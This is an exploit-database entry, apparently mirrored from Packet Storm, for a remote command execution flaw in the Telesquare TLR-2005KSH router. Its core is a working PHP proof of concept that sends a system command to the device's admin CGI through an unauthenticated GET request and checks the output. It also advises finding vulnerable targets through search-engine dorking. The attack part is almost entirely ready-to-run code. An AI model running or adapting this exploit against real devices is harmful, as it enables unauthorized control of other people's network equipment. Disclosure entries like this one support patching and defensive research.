Lucene search
K

📄 Telesquare TLR-2005KSH Remote Command Execution

🗓️ 23 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 102 Views

Telesquare TLR-2005KSH remote command execution via admin interface.

Code
=============================================================================================================================================
    | # Title     : Telesquare TLR-2005KSH - Remote Command Execution vulnerability                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : http://telesquare.co.kr/                                                                                                    |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Telesquare TLR-2005KSH Automated Control Vulnerability
    	
    [+] Payload : 
    
    [+] Set Target : line 5 + 7 .
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    $target_url = "http://<target>/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig"; 
    $headers = [
        "Host: <hostname>", 
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET");
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    if (strpos($response, '<CmdResult>') !== false && strpos($response, '</xml>') !== false && strpos($response, 'Ethernet') !== false && strpos($response, 'inet') !== false) {
        echo "The vulnerability was successfully exploited.\n";
        
    } else {
        echo "No exploitation of the vulnerability was detected.\n";
    }
    
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation